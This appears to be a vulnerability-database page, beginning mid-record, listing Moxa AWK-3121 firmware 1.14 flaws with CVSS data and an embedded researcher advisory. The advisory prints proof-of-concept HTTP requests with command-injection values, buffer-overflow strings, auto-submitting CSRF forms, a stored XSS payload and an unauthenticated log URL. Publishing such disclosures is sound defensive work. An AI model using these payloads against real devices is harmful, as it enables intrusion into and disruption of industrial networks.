"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-311",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120479"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "NVD",
"id": "CVE-2018-10694"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10694"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/311.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"db": "VULHUB",
"id": "VHN-120479"
},
{
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"db": "VULHUB",
"id": "VHN-120479"
},
{
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120479"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.420000",
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-120479"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"date": "2023-02-28T19:30:10.170000",
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Vulnerabilities related to certificate and password management in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
],
"trust": 0.6
}
}
VAR-201906-0793
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_serverip" is susceptible to buffer overflow. By crafting a packet that contains a string of 480 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 There is a buffer error vulnerability in the 'iw_serverip' parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0793",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "NVD",
"id": "CVE-2018-10703"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10703"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10703",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10703",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120489",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10703",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10703",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-331",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120489",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10703",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120489"
},
{
"db": "VULMON",
"id": "CVE-2018-10703"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015601"
},
{
"db": "NVD",
"id": "CVE-2018-10703"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-331"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter \"iw_serverip\" is susceptible to buffer overflow. By crafting a packet that contains a string of 480 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 There is a buffer error vulnerability in the \u0027iw_serverip\u0027 parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to 